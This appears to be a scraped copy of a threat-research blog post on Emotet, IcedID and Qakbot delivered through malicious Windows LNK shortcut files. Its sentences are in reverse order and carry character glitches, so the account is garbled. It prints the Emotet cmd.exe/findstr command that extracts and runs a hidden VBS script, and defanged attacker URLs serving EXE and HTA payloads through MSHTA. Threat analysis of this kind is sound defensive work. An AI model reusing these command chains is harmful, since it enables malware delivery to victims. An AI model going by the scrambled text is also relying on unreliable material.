![]() ![]() ![]() QAKBOT Infection-Chain Figure 9 _ Qakbot delivered via LNK file Infection-Chain Threat Analysis The Uri downloads the IcedID installer 64-bit EXE payload under the %HOME% folder. The downloaded HTA file invokes another PowerShell that has a similar obfuscated parameter, but this connects to Uri hxxps://hectorcallecom/listbul.exe The whole obfuscated argument is decrypted at run-time and then executes MSHTA with argument hxxps://hectorcallecom/093789.hta. The parameter is exceptionally long and is not fully visible in the target part. Here, PowerShell LNK has a highly obfuscated parameter which can be seen in Figure 8 target part of the LNK properties Figure 8 _ Properties of IcedID LNK sample This attack is a perfect example of how attackers chain LNK, PowerShell, and MSHTA utilities target their victims. ICEDID Infection-Chain Figure 7 _ IcedID delivered via LNK file Infection-Chain Threat Analysis The downloaded DLL is then finally executed using the REGSVR32.EXE utility which is similar behavior to the excel(.xls) based version of the emotet. The next part of the cmd.exe command invokes the VBS file using the Windows Script Host (wscript.exe) to download the main Emotet 64-bit DLL payload. VBS file under the %temp% folder with the random name YIScZcZKeP.vbs Once the findstr.exe utility receives the mentioned string, the rest of the content of the LNK file is saved in a. In our case the argument is /v:on /c findstr “glKmfOKnQLYKnNs.*” “Form, US.lnk” > “%tmp%\YlScZcZKeP.vbs” & “%tmp%\YlScZcZKeP.vbs” Figure 6 _ Contents of Emotet LNK file However, command-line arguments can be up to 4096, so malicious actors can that this advantage and pass on long arguments as they will be not visible in the properties. The target path as seen in the properties is only visible to 255 characters. To dig a little deeper, we see the properties of the LNK file: Figure 5 _Properties of Emotet LNK sampleĪs seen in Figure 5 the target part reveals that LNK invokes the Windows Command Processor (cmd.exe). The user is infected by manually accessing the attached LNK file. In Figure 4 we can see the lure message and attached malicious LNK file. We will go through three recent malware campaigns Emotet, IcedID, and Qakbot to see how dangerous these files can be.ĮMOTET Infection-Chain Figure 3 _Emotet delivered via LNK file Infection-Chain Threat Analysis Figure 4 _ Email user received having malicious LNK attached These files instruct legitimate applications like PowerShell, CMD, and MSHTA to download malicious files. Threat actors are using email spam and malicious URLs to deliver LNK files to victims. With Microsoft disabling office macros by default malware actors are now enhancing their lure techniques including exploiting LNK files to achieve their goals. Figure 2 _ LNK files as seen by a normal user LNK THREAT ANALYSIS & CAMPAIGNS In this blog, we will see how LNK files are being used to deliver malware such as Emotet, Qakbot, and IcedID.īelow is a screenshot of how these shortcut files look to a normal user. Figure 1 – Apr to May month geolocation of the LNK attacks Attackers are exploiting the ease of LNK, and are using it to deliver malware like Emotet, Qakbot, IcedID, Bazarloaders, etc. There are many tools also available to build LNK files, also many people have built “lnkbombs” tools specifically for malicious purposes.ĭuring the second quarter of 2022, McAfee Labs has seen a rise in malware being delivered using LNK files. These files can be created manually using the standard right-click create shortcut option or sometimes they are created automatically while running an application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |